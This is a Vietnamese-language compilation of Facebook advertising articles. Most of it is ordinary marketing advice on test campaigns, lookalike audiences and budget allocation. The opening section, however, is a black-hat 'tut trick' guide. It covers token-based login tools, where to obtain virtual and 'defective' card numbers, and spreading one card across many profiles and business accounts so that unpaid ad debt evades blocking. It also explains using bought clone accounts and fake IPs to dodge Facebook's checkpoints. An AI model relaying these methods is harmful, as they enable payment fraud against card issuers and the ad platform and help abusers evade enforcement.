  + Login bằng token:  Kỹ thuật này thường thấy trên các tool spam, bản chất của nó là từ token full quyền tool sẽ chuyển thành cookie và session đang login của tài khoản để đăng nhập 1 cách an toàn. Ưu điểm của nó là có thể quản lý, kiểm tra tài khoản live or die sll. Nó khá phức tạp với người mới để các bạn có thể tự tạo 1 trang login bằng token của riêng mình. Nên các bạn cũng chưa cần, tìm hiểu sau.

  4- Business Facebook: 1 profile có thể tạo ra 2 BM,

  Các bạn có thể khởi tạo business facebook thông qua đường link: http://business.facebook.com và http://business.facebook.com/overview

  Những kiến thức các bạn cần nắm vững chắc: Add phương thức thanh toán, tạo page, tạo pixel, tạo tài khoản ads, gán đối tác, thêm người, thêm tài sản, thêm thành viên quản trị BM. Tôi sẽ ko đi sâu phần này vì các bạn có thể google.

  II- Nhập môn tut trick facebook :

  Nguồn mua thẻ, add thẻ không bị bay mầu, tận thẻ dụng tối đa.

  1- Các nguồn thẻ chính thống tại việt nam

  Các site các bạn có thể mua thẻ ảo trực tuyến với số lượng:

  Thẻ VP Bank: http://www.chiakhoavang.vn/ – https://smartcash.vpbank.com.vn/

  Thẻ TP Bank: https://card.vtcpay.vn/profile

  Thẻ Sacom Bank: https://thanhtoanonline.vn

  Thẻ vật lý có định danh Viettin Bank: Làm offline tại các chi nhánh, không giới hạn số lượng tuy nhiên 1 người chỉ làm được 1 lần.

  Thẻ vật lý có định danh  ACB, Techcombank, Maritime, indochina bank: 1 người có thể làm từ 2 đến 4 thẻ. Tuy nhiên những đầu thẻ này rất chất, sử dụng rất tốt.

  Trong trường hợp muốn rút tiền về từ thẻ đã nạp tiền các bạn sử dụng: http://store.baokim.vn/ hoặc http://nganluong.vn

  Vấn đề về thẻ luôn là việc đau đầu với dân làm black, vì bất kỳ 1 hệ thống nào khi có số lượng tk báo đỏ ( có nợ ) quá nhiều trên cùng 1 đầu thẻ thì sẽ tự động chặn. Fb cũng như vậy, hiện tại chỉ có đầu thẻ vật lý viettin, acb, techcom, maritime và thẻ ảo sacom đang add làm pttt chính được, còn lại các đầu thẻ ảo khác chỉ có thể thêm pttt phụ.

  Ngoài ra các bạn có thể khai thác nguồn thẻ ảo nước ngoài: https://longhn.com/25-nguon-free-virtual-card-visa-maste… – Pass: freesah

  Hoặc nếu mua được đầu thẻ thực vật bị lỗi ( Thẻ đã hết tiền nhưng ngân hàng vẫn cho charge 1$, check thì live mà ko thể tiêu tiền được ) Thi thoảng anh em black vẫn dùng tool đào được và bán trên thị trường thì các bạn có thể vào trang http://www.elfqrin.com/discard_… để get thẻ về dùng add fb.

  2- Add pttt an toàn 100% không bị bay mầu.

  + Add pttt vào thanh toán cá nhân: 

  Nhiều bạn mới tạo tài khoản fb xong thì vội add thẻ, và tài khoản báo bất thường trong 1 nốt nhạc. Nguyên nhân rất dễ hiểu: AI của fb đủ thông minh để nhận rằng 1 người dùng mới tinh không có business gì trên fb muốn add pttt là khác thường.

  Để add pttt cá nhân an toàn nhất trước hết bạn cần làm: Tạo 1 profile đầy đủ thông tin ( full info, up avarta, cover, có bài post ), tạo 1 page bất kỳ và cũng điền full info cho page.

  Đăng vài bài lên page, like page, like bài. Done, bây giờ bạn có thể add thẻ vào phương thức thanh toán cá nhân sống 100%. Chú ý rằng 1 thẻ có thể add cho 10 profile cá nhân, tuy nhiên chỉ 1 profile bay mầu thì 9 profile còn lại sẽ bị mất pttt.

  + Add pttt vào thanh toán của Business Facebook: 

  Bản chất của business facebook được sinh ra để giúp các doanh nghiệp đa quốc gia có thể kết nối và làm việc trong nhiều dự án khác nhau. Vì vậy việc add pttt vào business khá đơn giản, tôi ưa thích dùng busniess vì nhiều tính năng ưu việt của nó, tôi sẽ giải thích ở sau.

  Các bạn chỉ việc chú ý rằng, 1 thẻ có thể add cho 10 BM khác nhau, và nếu các bạn tạo tài khoản ads ngay trong BM có pttt. Sau này dù 1 tk ads bị bất thường thì pttt trong các tk ads khác thuộc các BM đã được add thẻ vẫn giữ nguyên ( chỉ còn vỏ để sử dụng lên camp, nó sẽ ko thanh toán được )

  Đây là ưu điểm rất lớn của BM mà chúng ta có thể khai thác. Trước đây 1 bm từ profile vn có thể tạo ra 5 tài khoản Ads, hiện tại fb đã giảm xuống còn 1. Phương án xử lý: Các bạn dùng clone ngoại tạo bm, tạo 5 tài khoản ads, tạo link fb.me đưa bm về clone vn để add thẻ vn,và thêm pttt cho từng tk ads =))

  Chú ý: Hiện tại tiền vnđ và $ US sẽ gặp tình trạng delay ngưỡng, không lên được các ngưỡng cao. Vì vậy khi add pttt và tạo tài khoản ads các bạn fake ip để về ngưỡng cũ, chọn các đồng tiền như bạt thái, yên nhật, bảng anh, đô la canada, đô la singapor để lên ngưỡng lại bt nhé

  III- Lên camp: Các cách cơ bản, Kỹ thuật lên camp tránh checkpoint, các phương pháp test khi fb có bão.

  1- Các cách lên camp cơ bản khi sử dụng tut trick facebook: 

  • Lên camp boot post ( là dạng lên camp cơ bản và lành nhất, nhiều anh em mới ưa thích sử dụng )
  • Lên camp trong ads manager ( thường dùng ads cá nhân, anh em lên camp mồi bằng cách chạy cover hoặc like trang )
  • Lên camp trong Power editor ( thường dùng trong BM, ưu điểm là có thể xuất file để lên cùng 1 camp cho nhiều tk ads cùng 1 lúc, độ khó cao hơn 2 loại trên )

  Ngoài ra còn có các cách lên camp khác: Lên camp bằng app điện thoại vật lý, lên camp bằng app điện thoại giả lập qua blue stack, memu, nox…v…v..

  Các bạn có thể tham khảo thêm bài: https://longhn.com/40-cach-len-camp…

  2- Kỹ thuật lên camp để né checkpoint

  Nguyên nhân của việc lên camp bị check point trong thời gian gần đây là động thái phản ứng của hệ thống fb đối với các tool lên camp hàng loạt tại việt nam. Bản chất của việc sử dụng tool để lên camp là gán quyền đối tác cho hàng loạt tài khoản vào 1 profile và lên camp dẫn đến việc HỦY ĐĂNG TRANG và check point tài khoản lên camp.

  Phương án giải quyết:

  • Dùng1 profile A có lịch sử hoạt động tạo BM, tạo page ( không tạo tài khoản ads ) tạo nhiều link fb.me lưu ra sẵn
  • Tạo 1 loạt profile B trắng tạo BM, add pttt, tạo tài khoản ads. Kéo link fb.me của profile A sang. Dùng tk ads trogn bm của profile B lên camp cho page nằm trong BM của profile A. Các bạn sẽ thấy gần như ko có tỷ lệ hủy đăng trang + check point tài khoản.

  3- Các phương pháp tut trick facebook test lên camp khi bị fb có bão.

  Chúng ta có 3 yếu tố ảnh hưởng đến việc lên camp live or die. Dựa vào 3 yếu tố này thì khi có bão, chúng ta có thể tự test tut và tìm lối đi cho riêng mình.

  • Tài khoản trust: 1 tài khoản có độ trust hay không phụ thuộc vào lúc khởi tạo, không hề từ việc nuôi nấng giống như các thánh thầy trên fb hay rao vặt. Nó phải đảm bảo các yếu tố: 1 tài khoản, 1 thiết bị, 1 ip sạch. Nếu các bạn ko biết chính xác, cứ tìm nhiều nguồn cung cấp clone và mua mỗi chỗ 1 ít để test.
  • Thẻ thanh toán: Đầu thẻ càng mới, càng ít người sử dụng thì tỷ lệ lên camp sống càng cao.
  • IP lên camp: Trong 1 số trường hợp, fb chặn ip việt nam hoặc 1 số nước thì cần fake ip sang các quốc gia mới hoặc có uy tín cao: US, UK, SIG, ĐỨC, NHẬT.

  Kết: Từ 3 yếu tố trên, kết hợp với các cách lên camp cơ bản thì các bạn sẽ có đâu đấy khoảng 50 – 70 trường hợp. Cứ kiên nhẫn vì ngành này không dành cho những người lười biếng, và nhớ nếu các bạn thành công lúc những người khác bỏ cuộc. Thì đấy sẽ là thành công rực rỡ nhất ! Chúc may mắn.

  Trong phần sau 2: Tôi sẽ nói về quản lý tài khoản trong business, phân quyền, gán đối tác, những lỗi thường mắc khi xây dựng hệ thống, các chú ý, chuyện đời, chuyện nghề mà thực tế tôi được trải nghiệm.

 • CHIẾN THUẬT CHẠY QUẢNG CÁO FACEBOOK

 • Tư duy: CAMP TEST & Phương pháp test chiến dịch cho các ngành.

  Chào quý boss và các shark, chưởng môn nhận thấy có nhiều khi các bạn lên camp test thì đã sai trong cách tư duy hoặc phương pháp. Dẫn đến việc đôi khi chúng ta khó có được những camp win ở mức ngân sách to mà chỉ loay hoay ở mức ngân sách nhỏ.

  Trước khi đi vào chi tiết, chúng ta sẽ loại bỏ các yếu tố về mặt kỹ thuật, tut trick hoặc các yếu tố về tuổi + vùng miền, thời gian, ngày lễ để dễ hình dung hơn về mặt TƯ DUY từ đó tìm đúng MỤC ĐÍCH CHIẾN DỊCH => chọn PHƯƠNG PHÁP PHÙ HỢP NHẤT. Các yếu tố ở phía trên chỉ có hiệu quả khi chúng ta đã win, đã đo lường được chi tiết =))

  Ok ace theo chưởng môn ???

  Các ngành hàng có yếu tố hạn chế về mặt địa điểm:

  spa, thẩm mỹ viện, nhà hàng, shop thời trang offline…v..v…

  Mục đích chiến dịch:

  Với các ngành hàng có yếu tố hạn chế về mặt địa điểm, volume khách hàng không lớn thì yếu tố ra đơn ngay trên bài post không còn là vấn đề quan trọng nhất. Tư duy đúng là người nào duy trì được ngân sách hiệu quả ổn định, tồn tại đủ lâu với bid thấp, chạy trường để nhồi sọ thông điệp + brand vào đầu khách hàng thì người đó win. Lúc này chúng ta sẽ cần tập trung vào 4 yếu tố:

  1- Các emotion tốt trên bài post (bài viết càng nhiều emotion ko phải like thì càng thể hiện cảm xúc của khách hàng đối với mẫu quảng cáo hay nói cách khác là độ ghi nhớ)

  2- Tần suất khách hàng nhìn thấy mẫu quảng cáo xuyên suốt chiến dịch (tần suất càng cao với giá bid thấp giúp khách hàng ghi nhớ tốt hơn)

  3- Chi phí CPM

  4- Tỷ lệ tăng trưởng doanh số / chi phí quảng cáo

  Phương pháp:

  Chạy song song 2 chiến dịch: Tương tác (các sản phẩm cần tư vấn nhiều thì thay bằng inbox hoặc gắn nút inbox trên post) + nhận thức thương hiệu hoặc số người tiếp cận. Thường chiến dịch nhận thức thương hiệu chiếm 10 – 15% ngân sách của ngày nhằm mục đích đẩy tần suất chiến dịch lên cao với cpm thấp nhất có thể. Và chiến dịch nên đánh dồn dập đồng loạt trong 7 – 10 ngày sau đó nghỉ vài ngày 1 tuần rồi ép xung tiếp. Ko nên dã liên tục vì volume thường ko chịu đc, dẫn đến khách hàng nhàm chán thương hiệu, mẫu quảng cáo.

  Các ngành hàng cao cấp:

  Hàng hiệu, dịch vụ cao cấp, giá trị rất cao

  Mục đích chiến dịch:

  Khi bán những sản phẩm có giá trị cao & cực cao trên Facebook thì chưởng môn cho rằng yếu tố quan trọng nhất là CR – TỶ LỆ CHUYỂN ĐỔI ĐƠN HÀNG

  Phương pháp:

  Để đẩy được tỷ lệ đơn hàng, thì các bạn cần chia các line target nhỏ từ 5 -10 line / chiến dịch quảng cáo. Đừng ham ép giá thầu xuống thấp vội, hãy chọn cho mình những line target có tỷ lệ chuyển đổi tốt nhất đã. Sau đó với những camp vit có thể gộp các line vào để tiêu ngân sách lớn. Lúc này thì mới cần chú ý về mặt chỉ số để tối ưu giá quảng cáo. Nhớ rằng khi bạn có những line target tốt, tỷ lệ chuyển đổi cao thì đấy là tối ưu tốt nhất cho ngành hàng của bạn.

  Các ngành hàng phổ thông có yếu tố bán đi bán lại nhiều lần

  hoặc upsale giá trị cao hơn

  Mục đích chiến dịch:

  Khi bạn muốn khách hàng mua hàng nhiều lần thì câu chuyện của bạn là gì, về bạn là ai, bạn có ưu thế gì, khách hàng nói gì về bạn là những yếu tố cần tập trung. Đồng thời xây dựng data khách hàng phễu lớn nhất có thể với cùng ngân sách. Nhưng đừng có suy nghĩ bỏ con săn sắt bắt có cá rô, chạy là phải lãi nhé, lãi ít cũng là lãi ?

  Phương pháp:

  Nên tận dụng hết thế mạnh của các kiểu chiến dịch chạy có yếu tố outbound traffic như canvas, leadform, lưu lượng truy cập. Một website chỉn chu thống nhất về mặt brand, đầy đủ thông tin sẽ giúp khách hàng có lòng tin hơn là những mẫu ads truyền thống như post hay tin nhắn. Ngoài ra, các bạn cũng có thể xây dựng cộng đồng người dùng thông qua group của Facebook nhằm thúc đẩy tỷ lệ chuyển đổi khi upsale.

  Các ngành hàng phổ thông

  khách hàng thường dễ ra quyết định mua hàng ngay tại post

  Mục đích chiến dịch:

  Thuần Push sale, bán hàng thật lực với cùng ngân sách quảng cáo.

  Phương pháp:

  Với những sản phẩm phổ thông, yếu tố nội dung thường là điểm mấu chốt giúp giảm giá thầu quảng cáo => Từ đó với cùng ngân sách mẫu quảng cáo có cơ hội tiếp cận với nhiều khách hàng hơn => tạo ra nhiều đơn hàng hơn. Muốn làm được việc ấy thì các bạn cần lên test nhiều nội dung có yếu tố bắt trend. Đồng thời chú ý khống chế chỉ số tần suất ở mức dưới 1,5, điểm phù hợp nằm trong khoảng 7 – 10.

  Tóm lại:

  Sau khi chúng ta có camp đã chạy lãi ( ít hay nhiều thì vẫn là lãi) ổn định một thời gian. Rồi mới xem báo cáo chi tiết hiệu quả để quyết định những hành động tiếp theo ví dụ: độ tuổi, giới tính, vùng miền, giờ phân phối, ngày phân phối ?? Những hành động chia tuổi, chia vùng miền ở những camp test đều là những hành động luyên thuyên, chẳng hiểu gì về hệ thống phân phối quảng cáo cũng như cơ chế quảng cáo mà các thầy tưởng tượng ra.

  Done, đó là tất cả những yếu tố quan trọng cần tập trung khi lên những chiến dịch test ban đầu, sẽ giúp các bạn lựa chọn đúng cách triển khai chiến dịch. Sau này sẽ tăng tỷ lệ win đối với những camp vit ngân sách lớn của các boss và shark. Chúc các bạn 1 tuần đổi xe, 1 tháng mua nhà nhé ? Giàu rùi đóng tiền đi học chưởng môn để tôi còn có tiền mua thêm mấy kg . vàng cất két ka ka… Đội ơn các boss và các shark ?

 • CẠNH TRANH trên Facebook Ads thực sự là gì? Tại sao phải NHANH khi làm quảng cáo?

  Chưởng môn thấy nhiều người nghĩ rằng cứ phải chạy làm sao cho giá bình luận thật rẻ, giá inbox phải thật tốt thì mới là… Cao thủ chạy ads =))) dễ hiểu thôi bởi vì họ đa phần chỉ là cá con, còn chưa hiểu đúng quảng cáo Facebook là gì.

  Nhớ rằng hình thái quảng cáo trên Facebook là một dạng quảng cáo GỢI Ý THEO NHU CẦU => Khách hàng còn chưa thực sự có ý định thì đã cần hiển thị quảng cáo để thúc đẩy mua hàng, và đương nhiên chẳng khách hàng nào chờ đợi bạn.

  Vì vậy, sự thực bán hàng trên Facebook không phải cạnh tranh về giá bán, càng ko phải cạnh tranh về chất lượng, brand lọ chai. Mà tất cả các nhà quảng cáo cùng TRANH CƯỚP tỷ lệ chuyển đổi của thị trường, ai nhanh thì người đấy được.

  Ngoài vấn đề hình thái quảng cáo chúng ta cũng biết rằng một hệ thống quy mô hoạt động ổn định tốt, thì đâu chỉ có dựa vào mỗi người làm quảng cáo đâu phải không?

  Tiêu tiền quảng cáo chậm thì tiền hàng vẫn đóng ở kho, nhân sự tele, care page, quản lý, giám đốc, thuê văn phòng, điện nước… Vân vân và mây mây đủ thứ chi phí đắt đỏ vẫn phải chi trả HÀNG NGÀY.

  Vậy sao nhà quảng cáo thay vì cố nghĩ chạy sao cho rẻ, mà không nghĩ cách tiêu tiền cho nhanh lên, nhiều hơn để các em tele sale khỏi buồn chán vì chờ đợi? Để anh quản lý vui vẻ mà lĩnh lương? Để ông chủ bớt cau có còn thưởng tới tấp cho anh em sớm ngày đổi xe mua nhà?

  Và hãy nhớ, kể cả bạn có đang đi làm thuê. Chẳng sao cả, chưởng môn cũng từng đi làm thuê vài lần trong đời. Mà làm thuê có dăm ba kiểu làm thuê: làm thuê là làm thuê, làm thuê cho gia đình, làm thuê mà như ông chủ… Có một kiểu làm thuê mà nhiều người cũng sẽ phải ngước nhìn các bạn: NHÂN VIÊN HUYỀN THOẠI

 • Look A Like trong Facebok Ads: Chuyên sâu đến chiến thuật

  Bây giờ rất nhiều thầy dạy học viên chạy look a like như 1 tấm bùa hộ mệnh, vì rủi ro khi chạy look a like là ở mức thấp. Nhưng sự thật look a like chạy có ngon… như lúc các bạn chạy ở trên lớp học hay không? Hay look a like chính xác là để làm gì? =))

  Look A Like trong Facebok Ads

  Trong bài này chưởng môn sẽ chia sẻ tất tần tật về look a like và các chiến thuật chạy cho các bạn mới nhé. Khỏi mất tiền đi học mấy cái lý thuyết liên thiên mà các thầy tưởng tượng ra ( ví dụ như kiểu 1% thì chạy ngân sách 600k, 10% thì chạy ngân sách 6tr/ ngày của 1 bên đào tạo gà gô nào đó đang dạy học viên. )

  Look A Like là gì?

  Là 1 tệp khách hàng được tạo ra từ việc đối sánh các yếu tố hành vi, nhân khẩu học của những khách hàng đến từ 1 đối tượng nguồn bất kỳ: Pixel, tương tác page, inbox page…v..v… Độ lớn của tệp sẽ được tính dựa vào số % mà các bạn chọn: Ví dụ ở thời điểm hiện tại, khi bạn chọn look a like 1% thì Facebook sẽ đối sánh để tạo ra 1 tệp tương đương với 1% dân số của Việt Nam – 670 nghìn người – 10% thì là 6 triệu 700 nghìn người, và đây là những người có cùng nhân khẩu học hay hành vi gần giống với đối tượng nguồn nhất.

  Khi nào nên Look A Like?

  Theo khuyến cáo của Facebook thì đối tượng nguồn cần ít nhất 1000 – 50000 người để có hiệu quả tốt nhất. Nghĩa là đối tượng nguồn của bạn càng nhiều, càng chất lượng, thì Facebook sẽ có thể đối sánh càng nhiều, từ đó chọn lọc ra những khách hàng phù hợp nhất với bạn.

  Lưu ý quan trọng khi chạy Look A Like:

  1. Không phải lúc nào Look A like cũng tốt, đặc biệt với những bạn mới chạy ads. Như các thông tin ở trên, chúng ta đều nhìn rõ một câu chuyện là chất lượng của tệp look a like phụ thuộc rất lớn vào Đối Tượng Nguồn. Hay nói chính xác thì trong quá trình chạy quảng cáo các bạn đang chọn vào các line target tốt, có nhiều khách hàng chất lượng tương tác vào page, inbox, hoặc vào pixel. Lúc này, look a like mới thể hiện được sức mạnh của nó. Còn nếu không thì look a like chỉ là 1 trò hề.
  2. Look a like có thể coi là 1 tệp khách hàng có độ lớn cố định, mỗi năm Facebook tăng trưởng người dùng chỉ vào khoảng 5 – 15% và cái gì cũng có ngưỡng của nó. Vậy nên việc chạy look a like mà không biết tính toán ngân sách sao cho phù hợp, rất dễ dẫn đến chuyện quá tải ngân sách. Làm cho chiến dịch chỉ ngon đc 1 2 ngày sau đấy thì đắt sml mà nhà quảng cáo chẳng hiểu tại sao. Xấu hơn, nó sẽ làm khách hàng cảm thấy khó chịu khủng khiếp =)) với những sản phẩm đắt tiền thì ko sao. Sản phẩm rẻ tiền thì dễ bị ẩn quảng cáo mất khách hàng lắm.
  3. Chạy look a like 1% hay… 10%? Cái này thì đánh giá trên nhiều yếu tố: Lịch sử trước đấy bạn chạy ads, kỹ thuật bạn thường sử dụng, đặc tính sản phẩm: bán đi bán lại nhiều không? giá thấp hay cao?…v.v… Nhưng chưởng môn khuyên anh em mới thì nên dựa vào đặc tính sản phẩm: Sản phẩm càng khó bán (đối tượng khách hàng vip) thì look % ít thôi, và ngược lại.

  Chiến thuật chạy cho Look A Like

  Thường anh em hay chạy look a like cho những đối tượng nguồn đã tương tác với trang hoặc pixel. Khi chạy kiểu này thì tỷ lệ chuyển đổi thường sẽ không như mong đợi Lý do rất dễ hiểu là khi chúng ta mới chạy ads, chưa có nhiều kỹ năng thì đối tượng nguồn của chúng ta phần lớn là khách hàng vãng lai, càng chạy look a like cho tệp này thì chúng ta càng fail. Vậy nên để chạy look a like cho hiệu quả, chúng ta cần chia các đối tượng nguồn ra, chạy các kiểu chiến dịch khác nhau cho phù hợp.

  Chiến thuật 1: Tạo ra các tệp look a like từ đối tượng nguồn chi tiết hơn,

  chạy look 1 – 3%. Và chạy chiến dịch đúng kiểu với đối tượng nguồn. Phù hợp với các sản phẩm cao tiền, hoặc đối tượng khách hàng đặc thù.

  Tạo 1 tệp Look a like đối tượng nguồn đã tương tác với trang, set camp chiến dịch tương tác.

  Tạo 1 tệp Look a like đối tượng nguồn đã inbox tới trang, set camp chiến dịch video inbox.

  Với pixel chúng ta làm tương tự, pixel nên tách ra pixel tổng + pixel chuyển đổi để lên chiến dịch sao cho phù hợp.

  Chiến thuật 2: Chạy phủ rộng, thôn tính thị trường,

  hãy cẩn trọng khi chọn phương án này. Điều kiện để bạn có thể làm việc này là bạn đang có 1 sản phẩm khá phổ thông, dễ mua dễ bán, chỉ số quảng cáo và bài viết đương nhiên tốt.

  Tạo tệp look a like 5-10% trên tổng dân số ( việt nam đang vào khoảng 6 triệu 7 người ), lên camp bán hàng ( tương tác hoặc inbox ) với ngân sách + số ngày chạy sao cho phù hợp. Đọc thêm bài này để biết đo ngân sách chạy: https://longhn.com/ky-thuat-5-buoc-kiem-soat-gia-thau-quang-cao-duoi-1000d-725.html Set 2 chiến dịch song song với ngân sách 80 – 20% . Thường với volume này chúng ta sẽ chạy ở ngân sách từ 10 đến 25tr / ngày

  Chiến dịch 80% ngân sách: Chiến dịch đẩy bán hàng trực tiếp, mục tiêu chiến dịch có thể là tương tác hoặc inbox.

  Chiến dịch 20% ngân sách: Chiến dịch lót đường, giúp khách hàng cảm giác quen thuộc với mẫu quảng cáo của bạn. Giúp bạn xuất hiện trong đầu nhiều khách hàng hơn với chi phí thấp nhất có thể nhằm đẩy tỷ lệ chuyển đổi cho chiến dịch bán hàng. Mục tiêu chiến dịch là Số người tiếp cận, chỉ số để 1 lần quảng cáo / 2-3 ngày.

  TÓM LẠI VỀ LOOK A LIKE:

  Look A Like không phải là 1 tấm bùa, và cũng không phải ai chạy look a like cũng auto win. Chúng ta vẫn phải liên tục bổ xung nhưng nguồn khách hàng mới thông qua những chiến dịch được tối ưu kĩ lưỡng với nhiều chiến thuật chạy khác nữa. Rồi mới chạy Look A Like và đương nhiên trong giai đoạn đầu ace mới chạy ads nó chỉ là 1 món gia vị không phải món chính. Trước khi bạn hành động gì, hãy chắc chắn hiểu rõ hành động của mình.

  Đây là tất cả về look a like mà chưởng môn biết, chúc Ace thành công. Bớt mất tiền cho mấy ông thần ba lăng nhăng, tưởng tượng ra đủ các kiểu thể loại kiến thức ơ kìa nhé :))

 • TƯ DUY: NGƯỜI BÁN, NGƯỜI MUA TRONG QUẢNG CÁO

  Người ta thường nói nhiều đến yếu tố làm sao để khách mua hàng này hàng kia? Làm sao để bán được nhiều hàng hơn?

  Nhưng chưởng môn nghĩ nếu lật ngược lại vấn đề thì chúng ta sẽ nhận ra còn 1 câu chuyện trước đấy nữa với các nhà quảng cáo đó là: ?? Chúng ta cũng sẽ phải mua của khách hàng trước!

  Sản phẩm của khách hàng là… Tiền. Và chúng ta cố gắng mua nó bằng 2 yếu tố: Cảm xúc của khách hàng + Giá trị sử dụng của sản phẩm / dịch vụ của chúng ta.

  Chưởng môn từng đọc rất nhiều, suy nghĩ cũng rất nhiều về vấn đề LÀM SAO ĐỂ BÁN THẬT NHIỀU HÀNG CHO KHÁCH? Rồi chưởng môn nhận ra rằng, nếu giữ tư duy lối mòn này thì những hành động của chúng ta phần lớn sẽ đi chệch hướng do quá tham khách hàng. Hay nói cách khác là chúng ta bị lòng tham của lợi nhuận che mờ đi lý trí.

  Vậy nhưng ở góc nhìn nhà quảng cáo là người đi mua hàng… Thì vấn đề lại được khai thác ở một khía cạnh mở hơn. Bản thân chúng ta sẽ nhận ra rằng nếu muốn mua vào được nhiều hơn ( có được nhiều tiền hơn ??? ) bản thân chúng phải tạo ra được giá trị cao hơn cho sản phẩm của chúng ta (khai thác cảm xúc khách hàng sâu hơn ko còn tham khách + tạo ra sản phẩm có giá trị sử dụng cao hơn).

  Ngoài ra, khi nhà quảng cáo coi chính mình là người ĐI MUA thì rõ ràng chúng ta sẽ trân trọng tài sản chúng ta có hơn. Chúng ta cũng sẽ chọn người “bán hàng” kĩ càng hơn, tập trung hơn hay nói cách khác là đúng khách hàng mục tiêu hơn từ đó tạo ra giá trị chuyển đổi cao hơn.

  Đặc biệt nữa, NGƯỜI MUA KHÔN MẤY CŨNG KHÔNG BẰNG NGƯỜI BÁN. Nếu chúng ta giữ suy nghĩ cũ, cách làm cũ, luôn coi khách hàng là người mua và chúng ta kiếm tiền từ họ thì đương nhiên khách hàng sẽ ko thấy thích thú gì lắm. Nhưng nếu chúng ta tư duy rằng chúng ta là người mua, khách hàng là người bán. Thì nhà quảng cáo sẽ luôn phải nghĩ làm khách hàng cảm thấy có lãi mỗi khi họ bán “Tiền” cho nhà quảng cáo. Khách hàng càng cảm thấy có lợi hơn trong mỗi lần “bán tiền” cho chúng ta, sự tăng trưởng về doanh số sẽ tự nhiên đến ngày một nhiều hơn với nhà quảng cáo.

  Cuối cùng:

  “Mọi người đều có một cái giá nhất định, điều quan trọng là tìm ra nó là gì.”

  Vài chia sẻ nhỏ về tư duy của mình, có thể đúng với một số người, cũng có thể sai với số khác. Nhưng như chưởng môn từng nói: “Tôi không cố làm hài lòng đám đông, tôi chỉ phục vụ những đối tượng đặc biệt và phù hợp”

 • NHƯ THẾ NÀO LÀ TỐI ƯU ĐÚNG TRONG FACEBOOK ADS?

  Anh ơi em chạy xyz làm sao để #bình_luận_rẻ đi?

  Anh ơi em bán abc làm sao để #tin_nhắn_rẻ hơn?

  Chưởng môn rất hay được hỏi những câu hỏi dạng này, mình hầu như ko rep và khi các cậu ý cứ cố hỏi. Câu trả lời mình hay rep là “Bỏ giá trên bài viết đi em, hoặc chấm để đc báo giá….”. ??Kết quả ngay lập tức giá rẻ đi 1 nửa, thậm chí còn 1/4. Vài hôm sau thì lại hỏi ” Anh ơi sao trước e chạy 1tr bán được 3tr2, e nghe lời anh giá bình luận rẻ 1 nửa. Nhưng chạy 1 triệu bán được 2 triệu 1? ” tất nhiên mình chỉ im lặng =)))

  Khi làm quảng cáo online, nhiều người đi học hoặc tự nghiên cứu chỉ loanh quanh thích tut trick kiểu ăn sổi. Mấy trò nhanh nhanh để có được giá bid rẻ hơn, cái họ nghĩ là #TỐI_ƯU. Thế nhưng, mấy trò đấy chỉ làm kết quả họ nhận về toàn ảo, hiệu quả bấp bênh trồi sụp, từ đó ko biết đánh giá hay hành động gì tiếp theo. Vậy chúng ta cần hiểu tối ưu ở đây là gì?

  TỐI ƯU trong ngành quảng cáo online có nghĩa đúng là thật NHANH chiếm lĩnh thị trường. Hay nói cách khác là ai tiêu được nhiều tiền quảng cáo online (có profit) nhanh hơn, bán được nhiều hàng nhanh hơn từ đó có chỉ số tỷ lệ chuyển đổi mạnh nhất. Thì người đấy TỐI ƯU hơn ??

  Làm sao để nhanh? Một hệ thống giống như nhiều bánh răng hoạt động muốn nhanh thì phải có được sự nhịp nhành, sự phối hợp giữa người làm quảng cáo chuyên nghiệp và vận hành phía sau từ kho bãi, hàng hoá, telesale, chăm sóc page… Nói cho rõ hơn nhà quảng cáo pro thì ngoài việc nắm rõ sản phẩm, ưu điểm hay nhược của sản phẩm còn phải hiểu rõ hệ thống của công ty mình, liên kết, điều phối chặt chẽ các bộ phận từ đó đưa ra các quyết định tối ưu nhất: Vit camp bao nhiêu 1 ngày? Giá nào thì điểm hòa, giá nào lãi? Chạy trong bao nhiêu ngày? Các kịch bản khi gặp đối thủ, kịch bản khi bão hòa thị trường?

  Một hệ thống dưới sự khống chế đầy quyền lực của một người làm quảng cáo đẳng cấp, sẽ có được ỔN ĐỊNH của nó. Và đấy chính là NHANH hay là TỐI ƯU nhất. Còn tất nhiên khi bạn đủ mạnh, tut trick sẽ trở thành những thứ gia vị vô cùng ngon giúp cho hệ thống của bạn bùng nổ 1 chút. Chứ lúc đầu, nên tạm gác nó qua 1 bên đi nhé.

  Tóm lại: Nhịp nhàng là ổn định, ổn định nghĩa là #NHANH ?? Muốn như thế, kiến thức đúng là phải có nền tàng, mỗi hành động điều chỉnh đều cần những đánh giá chiến dịch trên tổng thể mang yếu tố #ĐỊNH_LƯỢNG cụ thể, biết rõ mình đang làm gì và tại sao làm thế. Đấy mới là con đường đúng đắn để học và làm giàu bền vững nhờ QUẢNG CÁO ONLINE, làm được việc ấy thì dù đi bất kỳ mạng quảng cáo nào bạn cũng thành ĐỈNH, không nói riêng gì Facebook Ads.

  Chia sẻ này của chưởng môn mong ace thay đổi được tư duy, chiến thắng được chính những hạn chế của bản thân trên con đường làm quảng cáo online. Để tự mở ra con đường hay bầu trời riêng của chính mình ??

 • Phân phối ngân sách theo chiến dịch, kết cục là gì? & Giải pháp tối ưu

  Việc phân phối ngân sách theo chiến dịch, vốn không có gì mới mà các ads network khác như google ads đã áp dụng từ rất lâu. Vậy nhưng tại sao đến bây giờ Facebook mới sử dụng kiểu phân phối ngân sách này?

  Trước tiên chúng ta cùng điểm lược lại một số ưu nhược của việc phân phối ngân sách theo nhóm quảng cáo:

  Phân phối ngân sách theo nhóm quảng cáo

  Nói về ưu điểm,

  rõ ràng PPNS theo nhóm sẽ giúp nhà quảng cáo tùy biến hơn hẳn, nghĩa là tôi có nhiều target tôi có thể chia ngân sách vào các target nhỏ + nhiều mẫu quảng cáo khác nhau theo từng nhóm # nhau => Điều này giúp nhà quảng cáo lựa chọn nhóm có những giá trị chuyển đổi có lợi nhất đối với nhà quảng cáo (NQC), tất nhiên việc đo đạc hiệu quả chiến dịch sẽ cần chính xác và tỉ mỉ hơn hay nói cách khác là rắc rối hơn.

  Nói về nhược điểm,

  chính vì ưu điểm là có thể chia cắt nhỏ để testing nhưng câu chuyện là để kết quả đem về được chính xác, Facebook cần để tiến trình máy học (machine leanring) hoạt động riêng lẻ trên từng nhóm quảng cáo, mà tiến trình này tất nhiên bị ảnh hưởng từ ngân sách quảng cáo của từng nhóm.

  Vậy nên nhược điểm lớn nhất của PPNS theo nhóm là khi tăng tiền vào nhóm hiệu quả, chúng ta thường không giữ được giá thầu chiến thắng vì tiến trình machine learing được bắt đầu lại từ đầu ==> giá quảng cáo của nhóm đó tăng vọt.

